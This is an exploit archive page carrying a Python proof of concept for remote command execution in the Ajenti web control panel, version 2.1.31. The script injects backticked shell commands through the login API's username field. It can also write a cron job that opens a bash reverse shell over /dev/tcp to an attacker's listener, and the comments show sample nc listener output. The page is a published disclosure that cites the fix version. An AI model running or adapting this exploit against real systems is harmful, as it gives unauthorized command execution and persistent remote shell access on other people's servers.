what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ajenti Remote Command Execution

Ajenti Remote Command Execution
Posted Oct 11, 2019
Authored by Jeremy Brown

Ajenti suffers from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 3ce7fe662dcd1fad936763e9f3e597eb74b20d6a571486419c63670bd70af341

Ajenti Remote Command Execution

Change Mirror Download
#!/usr/bin/python
# ajentix.py
#
# Ajenti Remote Command Execution Exploit
#
# Jeremy Brown [jbrown3264/gmail] @ Oct 2019
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS.
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
# PID TTY TIME CMD
# 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ? 00:00:00 sh
# 18851 ? 00:00:00 bash
# 18859 ? 00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
#
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#

import os
import sys
import ssl
import json
import urllib.request as request

def main():
if(len(sys.argv) < 2):
print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0])
print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
return

host = sys.argv[1]
cmd = sys.argv[2]

if(cmd == 'shell'):
if(len(sys.argv) < 4):
print("Error: need ip to connect back to for shell")
return

ip = sys.argv[3]

shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
username = shell

else:
username = "`" + cmd + "`"

body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
byte = body.encode('utf-8')

url = "https://" + host + ":8000" + "/api/core/auth"

try:
req = request.Request(url)

req.add_header('Content-Type', 'application/json; charset=utf-8')
req.add_header('Content-Length', len(byte))

request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert

except Exception as error:
print("Error: %s" % error)
return

print("Done!")


if(__name__ == '__main__'):
main()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close